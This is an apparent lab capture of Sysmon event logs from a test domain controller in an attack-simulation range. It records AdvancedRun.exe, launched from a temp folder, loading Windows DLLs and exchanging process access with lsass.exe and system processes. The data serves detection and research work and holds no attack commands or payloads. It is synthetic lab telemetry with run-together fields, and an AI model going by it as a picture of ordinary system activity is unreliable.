20:15:10.549{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004075924Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.548{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004075923Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.548{834264DD-144E-61EB-7F08-000000002702}4108588C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075922Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.542{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004075921Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.537{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075920Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.524{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075919Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.522{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075918Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.521{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075917Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.520{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075916Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.519{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075915Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.516{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075914Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.515{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075913Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.513{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075912Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.513{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075911Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.513{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075910Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.513{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075909Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.512{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075908Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.511{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075907Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.511{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075906Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.510{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075905Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.510{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075904Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.510{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075903Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.510{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075902Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.509{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075901Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.509{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075900Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.509{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075899Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.509{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075898Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.508{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075897Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.508{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075896Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.508{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075895Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.507{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075894Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.505{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075893Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.504{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075892Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.503{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075891Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.502{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075890Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.502{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075889Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.502{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075888Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.501{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075887Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.500{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075886Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.500{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075885Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:15:10.499{834264DD-144E-61EB-7F08-000000002702}4108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075884Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 